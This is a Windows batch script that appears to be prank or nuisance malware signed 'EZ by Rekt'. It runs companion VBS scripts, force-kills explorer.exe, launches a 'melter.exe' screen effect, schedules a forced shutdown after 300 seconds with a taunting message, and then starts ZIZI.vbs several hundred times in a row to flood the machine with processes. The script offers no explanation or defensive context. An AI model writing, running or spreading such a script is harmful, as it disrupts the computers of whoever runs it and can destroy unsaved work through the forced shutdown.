@echo off
start parle.vbs
timeout /T 20 /NOBREAK>nul
taskkill /f /im explorer.exe
start melter.exe
start musicstart.vbs
start ZIZI.vbs
shutdown -s -t 300 -c "MMMMMM... EZ by Rekt"
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs